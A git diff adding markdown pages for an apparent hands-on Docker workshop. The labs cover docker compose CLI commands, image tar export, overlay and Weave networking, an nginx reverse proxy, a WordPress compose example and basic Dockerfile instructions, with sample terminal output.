"Docker-Compose-CLI-Port-Command" +--- + +#### Print the public port for a port binding. + +```sh +docker compose port result 80 +0.0.0.0:5001 +➜ example-voting-app git:(main) + +``` + + diff --git a/content/en/docker/a39.docker-compose-ps 2.md b/content/en/docker/a39.docker-compose-ps 2.md new file mode 100644 index 0000000..c3b61dc --- /dev/null +++ b/content/en/docker/a39.docker-compose-ps 2.md @@ -0,0 +1,18 @@ +--- +title: "Docker Compose CLI - ps Command " +description: " List containers " +slug: "Docker-Compose-CLI-ps-Command" +--- + +#### List containers + +```sh + docker compose ps +NAME IMAGE COMMAND SERVICE CREATED STATUS PORTS +example-voting-app-db-1 postgres:15-alpine "docker-entrypoint.s…" db 4 hours ago Up About an hour (healthy) 5432/tcp +example-voting-app-redis-1 redis:alpine "docker-entrypoint.s…" redis 4 hours ago Up About an hour (healthy) 6379/tcp +example-voting-app-result-1 example-voting-app-result "nodemon server.js" result About an hour ago Up About an hour 0.0.0.0:5858->5858/tcp, 0.0.0.0:5001->80/tcp +example-voting-app-worker-1 example-voting-app-worker "dotnet Worker.dll" worker About an hour ago Up About an hour +➜ example-voting-app git:(main) + +```` diff --git a/content/en/docker/a4.tarfile 2.md b/content/en/docker/a4.tarfile 2.md new file mode 100644 index 0000000..f3784bb --- /dev/null +++ b/content/en/docker/a4.tarfile 2.md @@ -0,0 +1,68 @@ +--- +title: "Images and Container As Tar file" +slug: Images-and-Container-As-Tar-file +--- + +#### Images and Container as Tarfile + +Docker provides the ability to save images and containers as tar files, which can be useful for sharing with others or transferring between systems. Here's how to do it: + + +```sh +docker pull nginx:latest +latest: Pulling from library/nginx +5731adb3a4ab: Pull complete +8785c8f663d3: Pull complete +023b6bd393e4: Pull complete +fd8f86b165b0: Pull complete +8f41e7c12976: Pull complete +3b5338ea7d08: Pull complete +Digest: sha256:6650513efd1d27c1f8a5351cbd33edf85cc7e0d9d0fcb4ffb23d8fa89b601ba8 +Status: Downloaded newer image for nginx:latest +docker.io/library/nginx:latest + +``` + +#### Saving an Image as a Tar File + +To save a Docker image as a tar file, use the docker save command with the image name and output file name: + +```sh +dockerworkshop git:(main) βœ— docker container run -it ubuntu:14.04 bash +Unable to find image 'ubuntu:14.04' locally +14.04: Pulling from library/ubuntu +d1a5a1e51f25: Pull complete +75f8eea31a63: Pull complete +a72d031efbfb: Pull complete +Digest: sha256:64483f3496c1373bfd55348e88694d1c4d0c9b660dee6bfef5e12f43b9933b30 +Status: Downloaded newer image for ubuntu:14.04 +root@906d9f72e9fe:/# exit +exit + +``` + +```sh +➜ dockerworkshop git:(main) βœ— docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +1bf183201392 ubuntu:14.04 "bash" 15 seconds ago Up 14 seconds loving_ride +``` + +```sh +docker export 1b > os.tar +docker export loving_ride > os1.tar +dockerworkshop git:(main) βœ— ls +os.tar os1.tar +``` + + +docker load is a command used to load images or container archives that were previously saved using the docker save command. + +When you use the docker save command, it creates a tar archive of one or more Docker images and/or containers. You can then use the docker load command to load this tar archive back into Docker. + +The syntax for using the docker load command is as follows: + +```sh +➜ dockerworkshop git:(main) βœ— docker save -o os.tar ubuntu +➜ dockerworkshop git:(main) βœ— docker load < os.tar +Loaded image: ubuntu:14.04 +``` diff --git a/content/en/docker/a40.docker-compose-pull 2.md b/content/en/docker/a40.docker-compose-pull 2.md new file mode 100644 index 0000000..940e6d1 --- /dev/null +++ b/content/en/docker/a40.docker-compose-pull 2.md @@ -0,0 +1,19 @@ +--- +title: "Docker Compose CLI - pull Command " +description: " Pull service images " +slug: "Docker-Compose-CLI-pull-Command" +--- + +#### Pull service images + + +```sh + example-voting-app git:(main) docker compose pull +[+] Running 5/5 + β Ώ vote Skipped - No image to be pulled 0.0s + β Ώ result Skipped - No image to be pulled 0.0s + β Ώ worker Skipped - No image to be pulled 0.0s + β Ώ redis Pulled 2.8s + β Ώ db Pulled 2.8s + +``` \ No newline at end of file diff --git a/content/en/docker/a41.docker-compose-push 2.md b/content/en/docker/a41.docker-compose-push 2.md new file mode 100644 index 0000000..34cc537 --- /dev/null +++ b/content/en/docker/a41.docker-compose-push 2.md @@ -0,0 +1,22 @@ +--- +title: "Docker Compose CLI - push Command " +description: " Push service images " +slug: "Docker-Compose-CLI-push-Command" +--- + +#### Push service images + + +```sh + +services: + service1: + build: . + image: localhost:5000/yourimage ## goes to local registry + + service2: + build: . + image: your-dockerid/yourimage ## goes to your repository on Docker Hub + +``` + diff --git a/content/en/docker/a42.docker-compose-restart 2.md b/content/en/docker/a42.docker-compose-restart 2.md new file mode 100644 index 0000000..8067444 --- /dev/null +++ b/content/en/docker/a42.docker-compose-restart 2.md @@ -0,0 +1,20 @@ +--- +title: "Docker Compose CLI - restart Command " +description: " restart service images " +slug: "Docker-Compose-CLI-restart-Command" +--- + +#### restart service images + +```sh +docker compose restart +[+] Running 5/5 + β Ώ Container example-voting-app-db-1 Started 0.7s + β Ώ Container example-voting-app-redis-1 Started 0.7s + β Ώ Container example-voting-app-result-1 Started 0.6s + β Ώ Container example-voting-app-vote-1 Started 0.5s + β Ώ Container example-voting-app-worker-1 Started 0.4s +➜ example-voting-app git:(main) +``` + + diff --git a/content/en/docker/a43.docker-compose-rm 2.md b/content/en/docker/a43.docker-compose-rm 2.md new file mode 100644 index 0000000..299bd0e --- /dev/null +++ b/content/en/docker/a43.docker-compose-rm 2.md @@ -0,0 +1,31 @@ +--- +title: "Docker Compose CLI - rm Command " +description: " Removes stopped service containers" +slug: "Docker-Compose-CLI-rm-Command" +--- + + +#### Removes stopped service containers + + +```sh +➜ example-voting-app git:(main) docker compose stop +[+] Running 5/5 + β Ώ Container example-voting-app-vote-1 Stopped 0.3s + β Ώ Container example-voting-app-result-1 Stopped 0.3s + β Ώ Container example-voting-app-worker-1 Stopped 0.1s + β Ώ Container example-voting-app-db-1 Stopped 0.1s + β Ώ Container example-voting-app-redis-1 Stopped 0.2s +➜ example-voting-app git:(main) docker compose rm +? Going to remove example-voting-app-vote-1, example-voting-app-result-1, example-voting-app-worker-1, example-voting-app-db-1, example-voting-app-redis-1 Yes +[+] Running 5/0 + β Ώ Container example-voting-app-redis-1 Removed 0.0s + β Ώ Container example-voting-app-vote-1 Removed 0.0s + β Ώ Container example-voting-app-result-1 Removed 0.0s + β Ώ Container example-voting-app-db-1 Removed 0.0s + β Ώ Container example-voting-app-worker-1 Removed 0.0s +➜ example-voting-app git:(main) + + + +``` diff --git a/content/en/docker/a44.docker-compose-run 2.md b/content/en/docker/a44.docker-compose-run 2.md new file mode 100644 index 0000000..7540555 --- /dev/null +++ b/content/en/docker/a44.docker-compose-run 2.md @@ -0,0 +1,40 @@ +--- +title: "Docker Compose CLI - run Command " +description: " run service containers" +slug: "Docker-Compose-CLI-run-Command" +--- + + +```sh + +➜ example-voting-app git:(main) docker compose run db + +PostgreSQL Database directory appears to contain a database; Skipping initialization + +2023-03-04 19:16:58.496 UTC [1] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +2023-03-04 19:16:58.496 UTC [1] LOG: listening on IPv4 address "0.0.0.0", port 5432 +2023-03-04 19:16:58.496 UTC [1] LOG: listening on IPv6 address "::", port 5432 +2023-03-04 19:16:58.498 UTC [1] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +2023-03-04 19:16:58.503 UTC [24] LOG: database system was shut down at 2023-03-04 19:15:07 UTC +2023-03-04 19:16:58.510 UTC [1] LOG: database system is ready to accept connections +^C2023-03-04 19:17:11.082 UTC [1] LOG: received fast shutdown request +2023-03-04 19:17:11.088 UTC [1] LOG: aborting any active transactions +2023-03-04 19:17:11.108 UTC [1] LOG: background worker "logical replication launcher" (PID 27) exited with exit code 1 +2023-03-04 19:17:11.108 UTC [22] LOG: shutting down +2023-03-04 19:17:11.110 UTC [22] LOG: checkpoint starting: shutdown immediate +2023-03-04 19:17:11.117 UTC [22] LOG: checkpoint complete: wrote 3 buffers (0.0%); 0 WAL file(s) added, 0 removed, 0 recycled; write=0.003 s, sync=0.001 s, total=0.009 s; sync files=2, longest=0.001 s, average=0.001 s; distance=0 kB, estimate=0 kB +2023-03-04 19:17:11.127 UTC [1] LOG: database system is shut down +➜ example-voting-app git:(main) docker compose run worker +[+] Running 2/2 + β Ώ Container example-voting-app-db-1 Created 0.0s + β Ώ Container example-voting-app-redis-1 Created 0.0s +[+] Running 2/2 + β Ώ Container example-voting-app-db-1 Started 0.5s + β Ώ Container example-voting-app-redis-1 Started 0.5s +Connected to db +Found redis at 172.20.0.3 +Connecting to redis +^C% +➜ example-voting-app git:(main) + +``` \ No newline at end of file diff --git a/content/en/docker/a45.local-network 2.md b/content/en/docker/a45.local-network 2.md new file mode 100644 index 0000000..75d5e2a --- /dev/null +++ b/content/en/docker/a45.local-network 2.md @@ -0,0 +1,70 @@ +--- +title: "Setup local network " +description: " overlay network " +slug: "Setup-local-network" +--- + + +#### Docker network create command syntax + +```sh +docker network create --help +``` +#### view current networks + +```sh +docker network ls +clear +``` + +#### Create a new overlay network, with all default options + +```sh +docker network create -d overlay defaults-over +``` +### Create a new overlay network with specific IP settings + +```sh +docker network create -d overlay \ +--subnet=172.30.0.0/24 \ +--ip-range=172.30.0.0/28 \ +--gateway=172.30.0.254 \ +specifics-over +``` + +#### view current networks again + +```sh +docker network ls +``` +### Initial validation + +```sh +docker network inspect specifics-over --format '{{json .IPAM.Config}}' | jq +``` +clear + +### Create service tester1 +```sh +docker service create --detach --replicas 3 --name tester1 \ +--network specifics-over alpine tail -f /dev/null +``` + +#### Create service tester2 + +```sh +docker service create --detach --replicas 3 --name tester2 \ +--network specifics-over alpine tail -f /dev/null +``` + +### get the container names + +```sh +docker container ls +``` +#### From a container in the tester1 service ping the tester2 service by name + +```sh +docker container exec -it tester1.3. ping -c 3 tester2 +``` + diff --git a/content/en/docker/a46.remote-network 2.md b/content/en/docker/a46.remote-network 2.md new file mode 100644 index 0000000..6235dca --- /dev/null +++ b/content/en/docker/a46.remote-network 2.md @@ -0,0 +1,59 @@ +--- +title: "Setup Remote network " +description: " weave driver " +slug: "Setup-Remote-network" +--- + +#### Docker network managment command + +```sh +docker network --help +clear +``` + +### Starting on ubuntu-node01: Install and setup the weave driver + +```sh +sudo curl -L git.io/weave -o /usr/local/bin/weave +sudo chmod a+x /usr/local/bin/weave +export CHECKPOINT_DISABLE=1 +weave launch +eval $(weave env) +``` + +clear + +#### Now on ubuntu-node02: Install and setup the weave driver +```sh +sudo curl -L git.io/weave -o /usr/local/bin/weave +sudo chmod a+x /usr/local/bin/weave +export CHECKPOINT_DISABLE=1 +weave launch +eval $(weave env) +``` +clear + +#### Now, back on ubuntu-node01:Bring node02 in as a peer on node01's weave network +```sh +weave connect ubuntu-node02 +``` +#### Starting with ubuntu-node01:Run a container detached on node01 +```sh +docker container run -d --name app01 alpine tail -f /dev/null +``` +#### Now, launch a container on ubuntu-node02: Run a container detached on node02 +```sh +docker container run -d --name app02 alpine tail -f /dev/null +``` +#### Since we are on node02, we will check there first... +#### From inside the app02 container running on node02, +#### let's ping the app01 container running on node01 +```sh +docker container exec -it app02 ping -c 4 app01 +``` +#### Similarly, from inside the app01 container running on node01, +#### let's ping the app02 container running on node02 +```sh +docker container exec -it app01 ping -c 4 app02 +``` +clear diff --git a/content/en/docker/a47.Docker-Compose-Net 2.md b/content/en/docker/a47.Docker-Compose-Net 2.md new file mode 100644 index 0000000..5871a43 --- /dev/null +++ b/content/en/docker/a47.Docker-Compose-Net 2.md @@ -0,0 +1,54 @@ +--- +title: "Newtorking in Docker Compose " +slug: "Newtorking in Docker Compose" +--- + +### creating and using networks in docker-compose.yml + +```yml +version: "3.7" +services: + app1: + image: httpd:latest + container_name: app1 + ports: + - 8080:80 + networks: + - app1_net +networks: + app1_net: + +``` + +### run docker compose up + +```sh +docker-compose up + +``` + +### Open browser + +```sh +http://localhost:8080 +``` + +Observe the output + +### On a second terminal +```sh +docker ps +``` +#### Observe the networking part! + +```sh +docker inspect app1 + +``` + +### Stops the docker-compose +```sh +docker-compose rm +``` + + diff --git a/content/en/docker/a48.Docker-compose-ngnix-net 2.md b/content/en/docker/a48.Docker-compose-ngnix-net 2.md new file mode 100644 index 0000000..d00cf14 --- /dev/null +++ b/content/en/docker/a48.Docker-compose-ngnix-net 2.md @@ -0,0 +1,84 @@ +--- +title: "Newtorking in Docker Compose with ngnix" +description: " Docker Compose Newtorking " +slug: "Newtorking-in-Docker-Compose-with-ngnix" +--- + + +create docker-compose.yml with following content : + +```yml +version: "3.7" + +services: + web: + image: nginx:alpine + volumes: + - ./nginx.conf:/etc/nginx/nginx.conf + ports: + - 8080:80 + networks: + - app1_net + - app2_net + + app1: + image: httpd:latest + networks: + - app1_net + + app2: + image: httpd:latest + networks: + - app2_net + +networks: + app1_net: + app2_net: + +``` + +#### the following nginx.conf configuration file in the same directory: + +```sh + +events {} +http { + server { + listen 80; + listen [::]:80; + + server_name example.com; + + location / { + proxy_pass http://app1:80/; + } + location /app2 { + proxy_pass http://app2:80/; + } + } +} + + + + +``` + +### run docker compose + +```sh + +docker compose up +``` + +### Go to http://localhost:8080 and observer the command line + + +β€’ It will show you the nignx-container web_1 container (reverse_proxy) was requested
+β€’ And forwarded the request to β€œapp1” container
+β€’ Reload a few times to make this more obvious
+ +#### Go to http://localhost:8080/app2 and observe the command line +β€’ It will show you again that nginx-container web_1 container (reverse_proxy) was requested
+β€’ And now forwards to β€œapp2” container
+β€’ Reload a few times to make this more obvious
+ diff --git a/content/en/docker/a49.Docker-Wordpress 2.md b/content/en/docker/a49.Docker-Wordpress 2.md new file mode 100644 index 0000000..39c9827 --- /dev/null +++ b/content/en/docker/a49.Docker-Wordpress 2.md @@ -0,0 +1,37 @@ +--- +title: "Docker Wordpress Example " +slug: "Docker-Wordpress-Example" +--- + + +## create wordpress docker compose + + +```yml +wordpress: + image: wordpress + links: + - mariadb:mysql + environment: + - WORDPRESS_DB_PASSWORD=password + - WORDPRESS_DB_USER=root + ports: + - "public_ip:80:80" + volumes: + - ./html:/var/www/html +mariadb: + image: mariadb + environment: + - MYSQL_ROOT_PASSWORD=password + - MYSQL_DATABASE=wordpress + volumes: + - ./database:/var/lib/mysql + +``` + +### run docker compose + +```sh +docker compose up +``` + diff --git a/content/en/docker/a5.Push-DockerHub-Webapp 2.md b/content/en/docker/a5.Push-DockerHub-Webapp 2.md new file mode 100644 index 0000000..9de3071 --- /dev/null +++ b/content/en/docker/a5.Push-DockerHub-Webapp 2.md @@ -0,0 +1,128 @@ +--- +title: "Push first Nginx Web app To DockerHub" +description: "nginx" +slug: "Push-first-Nginx-Web-app-To-DockerHub" +--- + + +#### Pull nginx image from dockerhub using + +```sh +dockerworkshop git:(main) βœ— docker pull nginx +Using default tag: latest +latest: Pulling from library/nginx +Digest: sha256:6650513efd1d27c1f8a5351cbd33edf85cc7e0d9d0fcb4ffb23d8fa89b601ba8 +Status: Image is up to date for nginx:latest +docker.io/library/nginx:latest +``` +#### Run Docker with ngnix + +```sh + dockerworkshop git:(main) βœ— docker run --name docker-nginx -p 80:80 -d nginx +63258aebdc2d8ea40a0099efb3e51f8b15db2fe2dc048da3901843b4782d19fb +``` +–name docker-nginx : Name given to the container that is run is docker-nginx-p 80:80 : the port we are exposing and mapping from local machine port number to that of container, in the format local_machine_port:container_port-d : Detached mode – Runs the container in background + +#### check all running docker containers + +```sh +➜ dockerworkshop git:(main) βœ— docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +63258aebdc2d nginx "/docker-entrypoint.…" 55 seconds ago Up 55 seconds 0.0.0.0:80->80/tcp docker-nginx +``` + +#### open localhost with specific port + +![](./images/ngnix.png) + +#### Include a static Web Application in the Docker with NGINX + +To include our static Web Application into the Docker Image with NGINX, we shall create a Dockerfile (including commands to build image) and an html file with name index.html (acting as our web application) in a directory named nginx-app. + +create dockerfile with following content : + +```dockerfile + +FROM nginx +COPY . /usr/share/nginx/html + +``` +### create index.html file with following content + +```html + + + + Docker NGINX Tutorial + + +

Join CloudNativeFolks Community

+

Learn to Dockerize with NGINX and your web application.

+ Join Discord + NGINX Tutorial + + + +``` + +#### Build Dockerfile + +```sh +Dockerfile git:(main) βœ— docker build -t nginx-application -f dockerfile.ngnix . +[+] Building 0.1s (7/7) FINISHED + => [internal] load build definition from dockerfile.ngnix 0.0s + => => transferring dockerfile: 87B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/nginx:latest 0.0s + => [internal] load build context 0.0s + => => transferring context: 82B 0.0s + => [1/2] FROM docker.io/library/nginx 0.0s + => [2/2] COPY . /usr/share/nginx/html 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:54027a144afd33ddd1449b757581c7b554d5411c4b2bac291f5dfbccb85fda41 0.0s + => => naming to docker.io/library/nginx-application 0.0s +➜ Dockerfile git:(main) βœ— +``` + + +#### run updated ngnix webapp + +```sh +docker run --name docker-nginx-app -p 80:80 -d nginx-application + +``` + +#### List docker images + +```sh +Dockerfile git:(main) βœ— docker images +REPOSITORY TAG IMAGE ID CREATED SIZE +nginx-application latest e8742ef897ea 2 minutes ago 135MB +``` + +#### Tag Docker Images + +```sh +docker tag nginx-application sangam14/nginx-application + +``` + +#### Login into Your DockerHub Account + +```sh +docker login +docker push sangam14/nginx-application +Using default tag: latest +The push refers to repository [docker.io/sangam14/nginx-application] +4e9e8987d0ed: Pushed +7a99131e1da4: Mounted from library/nginx +c61a83b92ad9: Mounted from library/nginx +0d96feb871c8: Mounted from library/nginx +902b28ccafe7: Mounted from library/nginx +3063fc92629d: Mounted from library/nginx +a49c6ceb5b3a: Mounted from library/nginx +latest: digest: sha256:09f29db6e4179bd1019a48d2d50944989347fdf145193f4165353d5148a902c8 size: 1777 + +``` \ No newline at end of file diff --git a/content/en/docker/a6.Scratch-Image 2.md b/content/en/docker/a6.Scratch-Image 2.md new file mode 100644 index 0000000..61c8654 --- /dev/null +++ b/content/en/docker/a6.Scratch-Image 2.md @@ -0,0 +1,67 @@ +--- +title: "Build a Base Image from Scratch" +slug: "Build-a-Base-Image-from-Scratch" +--- + + +#### write simple c program + +```c +#include + +int main() +{ +printf("dockerworkshop"); +} +``` + +#### Compile C program + +```sh +gcc -o hello hello.c + +βœ— ./hello +dockerworkshop% + +``` + +#### create dockerfile with following content : + + +```dockerfile +FROM scratch +ADD hello / +CMD ["/hello"] +``` + +### Build Dockerfile without any base image + +```sh +Dockerfile git:(main) βœ— docker build -t sangam14/hello-scratch -f dockerfile.hello . +[+] Building 0.1s (5/5) FINISHED + => [internal] load build definition from dockerfile.hello 0.0s + => => transferring dockerfile: 87B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load build context 0.0s + => => transferring context: 33.47kB 0.0s + => [1/1] ADD hello / 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:769934a6858c0910a3682e966da6c8d9c15b0324307b092eb77258a9a08879ce 0.0s + => => naming to docker.io/sangam14/hello-scratch + + ``` + +#### run docker image + +```sh + docker run sangam14/hello-scratch + dockerworkshop + +``` + + + + + diff --git a/content/en/docker/a7.ADD-instruction 2.md b/content/en/docker/a7.ADD-instruction 2.md new file mode 100644 index 0000000..f28eff3 --- /dev/null +++ b/content/en/docker/a7.ADD-instruction 2.md @@ -0,0 +1,60 @@ +--- +title: "Dockerfile Lab - ADD instruction " +description: " Dockerfile Lab 1 " +slug: "Dockerfile-Lab-ADD-instruction" +--- + +Here's an example of a Dockerfile that uses the ADD instruction to copy a local file into a Docker image: + + +```Dockerfile +FROM ubuntu:latest + +WORKDIR /app + +ADD example.txt /app/ + +CMD ["cat", "/app/example.txt"] + +``` + +#### Build Dockerfile + + +```bash + + Dockerfile git:(main) βœ— docker build -t sangam14/add-dockerfile -f dockerfile.add . +[+] Building 5.2s (9/9) FINISHED + => [internal] load build definition from dockerfile.add 0.0s + => => transferring dockerfile: 131B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/ubuntu:latest 3.1s + => [auth] library/ubuntu:pull token for registry-1.docker.io 0.0s + => [1/3] FROM docker.io/library/ubuntu:latest@sha256:9a0bdde4188b896a372804be2384015e90e3f84906b750c1a53539b585fbbe7f 2.0s + => => resolve docker.io/library/ubuntu:latest@sha256:9a0bdde4188b896a372804be2384015e90e3f84906b750c1a53539b585fbbe7f 0.0s + => => sha256:9a0bdde4188b896a372804be2384015e90e3f84906b750c1a53539b585fbbe7f 1.13kB / 1.13kB 0.0s + => => sha256:61bd0b97000996232eb07b8d0e9375d14197f78aa850c2506417ef995a7199a7 424B / 424B 0.0s + => => sha256:a6be1f66f70f66ef43503292e38ccbfc14f2d5464e7736344783a8fc7bb339a8 2.31kB / 2.31kB 0.0s + => => sha256:8b150fd943bcd54ef788cece17523d19031f745b099a798de65247900d102e18 27.34MB / 27.34MB 1.4s + => => extracting sha256:8b150fd943bcd54ef788cece17523d19031f745b099a798de65247900d102e18 0.4s + => [internal] load build context 0.0s + => => transferring context: 78B 0.0s + => [2/3] WORKDIR /app 0.1s + => [3/3] ADD example.txt /app/ 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:c3438bfac421fa098b47f37ae00427eadcfb7ed36653a678738c63b0ab33a8d1 0.0s + => => naming to docker.io/sangam14/add-dockerfile + + + ``` + + ### run docker images + +``` +Dockerfile git:(main) βœ— docker run sangam14/add-dockerfile +Sangam Biradar +Docker Community Leader + +``` \ No newline at end of file diff --git a/content/en/docker/a8.Copy-instruction 2.md b/content/en/docker/a8.Copy-instruction 2.md new file mode 100644 index 0000000..cb92794 --- /dev/null +++ b/content/en/docker/a8.Copy-instruction 2.md @@ -0,0 +1,89 @@ +--- +title: "Dockerfile Lab - COPY instruction" +description: " Dockerfile Lab 2 " +slug: "Dockerfile-Lab-COPY-instruction" +--- + +COPY is a dockerfile command that copies files from a local source location to a destination in the Docker container. A Dockerfile is a text file with instructions to set up a Docker container. + +create myfile1.txt and myfile2.txt with following content : + +```sh +# myfile1.txt +Hello This is my first file ! +This is file will be copied in /usr/share directory from Docker host to Docker Container. +``` + +```sh +# myfile2.txt +Hello This is my second file ! +This is file will be copied in /tmp directory from Docker host to Docker Container. + +``` +The general syntax of the COPY command is: + +```sh +COPY + +``` +Here, `` and ``are file paths.` ` is the path to the source folder containing files to be copied. This option can be left empty to copy the contents of the current directory. The source of the files has to be a directory on the local computer. + +`` is the destination of the COPY command inside the docker container. This is the path where files are to be copied. + +```Dockerfile +# Instruction for Dockerfile to create a new image on top of the base image (ubuntu) +# Using the base image ubuntu: latest +FROM ubuntu:latest +# Copying myfile1.txt to the containers /usr/share directory +COPY myfile1.txt /usr/share +# Copying myfile2.txt to the containers /tmp directory +COPY myfile2.txt /tmp + +``` +### Build Dockerfile using following Command + +```sh + Dockerfile git:(main) βœ— docker build -t sangam14/copy-dockerfile -f dockerfile.copy . +[+] Building 2.2s (9/9) FINISHED + => [internal] load build definition from dockerfile.copy 0.0s + => => transferring dockerfile: 356B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/ubuntu:latest 2.1s + => [auth] library/ubuntu:pull token for registry-1.docker.io 0.0s + => CACHED [1/3] FROM docker.io/library/ubuntu:latest@sha256:9a0bdde4188b896a372804be2384015e90e3f84906b750c1a53539b585fbbe7f 0.0s + => [internal] load build context 0.0s + => => transferring context: 344B 0.0s + => [2/3] COPY myfile1.txt /usr/share 0.0s + => [3/3] COPY myfile2.txt /tmp 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:4c660d66bd5f94311a22be23394032e2f2dd45f40fb4831f8e083efe90488763 0.0s + => => naming to docker.io/sangam14/copy-dockerfile + + ``` + + #### check inside container and search for text file + +```sh +➜ Dockerfile git:(main) βœ— docker run -it sangam14/copy-dockerfile bash +root@27a3fbe098c3:/# ls +bin boot dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var +root@27a3fbe098c3:/# cat /usr/share/myfile1.txt +# myfile1.txt +Hello This is my first file ! +This is file will be copied in /usr/share directory from Docker host to Docker Container.root@27a3fbe098c3:/# ls +bin boot dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var +root@27a3fbe098c3:/# cat /tmp/myfile2.txt + +# myfile2.txt +Hello This is my second file ! +This is file will be copied in /tmp directory from Docker host to Docker Container.root@27a3fbe098c3:/# + +``` +both file successfully copied inside container + + + + + diff --git a/content/en/docker/a9.CMD-instruction 2.md b/content/en/docker/a9.CMD-instruction 2.md new file mode 100644 index 0000000..f793d7f --- /dev/null +++ b/content/en/docker/a9.CMD-instruction 2.md @@ -0,0 +1,54 @@ +--- +title: "Dockerfile Lab - CMD instruction " +slug: "Dockerfile-Lab-CMD-instruction" +--- + + +The CMD command we saw earlier followed the Shell syntax: + +```bash +CMD executable parameter1 parameter2 +``` + +However, it is better practice to use the JSON array format: + +```json +CMD ["executable", "parameter1", "parameter2"] +``` + +A CMD command can be overridden by providing the executable and its parameters in the docker ​run command. For example: + + +```dockerfile +FROM ubuntu +RUN apt-get update +CMD ["echo" , "Join CloudNativeFolks Community"] +``` +#### build dockerfile + +```sh + docker build -t sangam14/cmd-dockerfile -f dockerfile.cmd . +[+] Building 8.3s (7/7) FINISHED + => [internal] load build definition from dockerfile.cmd 0.0s + => => transferring dockerfile: 125B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/ubuntu:latest 2.1s + => [auth] library/ubuntu:pull token for registry-1.docker.io 0.0s + => CACHED [1/2] FROM docker.io/library/ubuntu@sha256:9a0bdde4188b896a372804be2384015e90e3f84906b750c1a53539b585fbbe7f 0.0s + => [2/2] RUN apt-get update 6.0s + => exporting to image 0.1s + => => exporting layers 0.1s + => => writing image sha256:c59a693968aab28243f6852d49be7299e0035e71e39b42f22c07be49cca74fb2 0.0s + => => naming to docker.io/sangam14/cmd-dockerfile + +``` + +#### run docker container + +```sh +Dockerfile git:(main) βœ— docker run sangam14/cmd-dockerfile +Join CloudNativeFolks Community + +``` + diff --git a/content/en/docker/helper 2.md b/content/en/docker/helper 2.md new file mode 100644 index 0000000..54b0767 --- /dev/null +++ b/content/en/docker/helper 2.md @@ -0,0 +1,72 @@ +--- +title: The Ultimate Docker Workshop Tracks +description: Hands on Labs +weight: 1 +--- + +### Table of Content +| Title | Link | +| --------- | ------- | +|1.Pre-requisit for this lab | [Lab](https://kubedaily.com/docs/0.0.1/pre-requist/) | +|2.Docker Hello World Example | [Lab](https://kubedaily.com/docs/0.0.1/hello-world/) | +|3.Docker Image Filtering | | [Lab](https://kubedaily.com/docs/0.0.1/docker-images-filter/) | +|4.Images and Container As Tar file | [Lab](https://kubedaily.com/docs/0.0.1/tarfile/) | +|5.Push first Nginx Web app To DockerHub | [Lab](https://kubedaily.com/docs/0.0.1/push-dockerhub-webapp/) | +|6.Build a Base Image from Scratch | [Lab](https://kubedaily.com/docs/0.0.1/scratch-image/) | +|7.Dockerfile Lab - ADD instruction | [Lab](https://kubedaily.com/docs/0.0.1/add-instruction/) | +|8.Dockerfile Lab - COPY instruction | [Lab](https://kubedaily.com/docs/0.0.1/copy-instruction/) | +|9.Dockerfile Lab - CMD instruction | [Lab](https://kubedaily.com/docs/0.0.1/cmd-instruction/) | +|10.Dockerfile Lab - Entrypoint instruction | [Lab](https://kubedaily.com/docs/0.0.1/entrypoint-instruction/) | +|11.Dockerfile Lab - WORKDIR instruction | [Lab](https://kubedaily.com/docs/0.0.1/workdir-instruction/) | +|12.Dockerfile Lab - RUN instruction | [Lab](https://kubedaily.com/docs/0.0.1/run-instruction/) | +|13.Dockerfile Lab - ARG instruction | [Lab](https://kubedaily.com/docs/0.0.1/arg-instruction/) | +|14.Dockerfile Lab - Volume instruction | [Lab](https://kubedaily.com/docs/0.0.1/arg-instruction/) | +|15.Dockerfile Lab - USER instruction | [Lab](https://kubedaily.com/docs/0.0.1/user-instruction/) | +|16.Dockerfile Lab - HEALTHCHECK instruction | [Lab](https://kubedaily.com/docs/0.0.1/healthcheck-instruction/) | +|17.Dockerfile Lab - ENV instruction | [Lab](https://kubedaily.com/docs/0.0.1/env-instruction/) | +|18.Dockerfile Lab - ONBUILD instruction | [Lab](https://kubedaily.com/docs/0.0.1/onbuild-instruction/)| +|19.Running multiple docker containers from CLI | [Lab](https://kubedaily.com/docs/0.0.1/multiple-container/) | +|20.Write First Docker Compose file | [Lab](https://kubedaily.com/docs/0.0.1/write-first-docker_compose/) | +|21.Docker Compose with Volume Mount | [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-volumes/) | +|22.Build Own Dockerfile and Docker Compose with Custom configuration| [Lab](https://kubedaily.com/docs/0.0.1/custom-docker-compose/) | +|23.Simple php apache and database using docker compose| [Lab](https://kubedaily.com/docs/0.0.1/php-database-docker-compose/) | +|24.Host Volume Mount - Data persistentence| [Lab](https://kubedaily.com/docs/0.0.1/host-volume-mount/) | +|25.Named Volume Mount - Data persistentence| [Lab](https://kubedaily.com/docs/0.0.1/name-volume-mount/) | +|26.Docker Compose CLI - Build Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-build/) | +|27.Docker Compose CLI - Config Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-config/) | +|28.Docker Compose CLI - CP Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-cp/) | +|29.Docker Compose CLI - Create Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-create/) | +|30.Docker Compose CLI - Down Command| 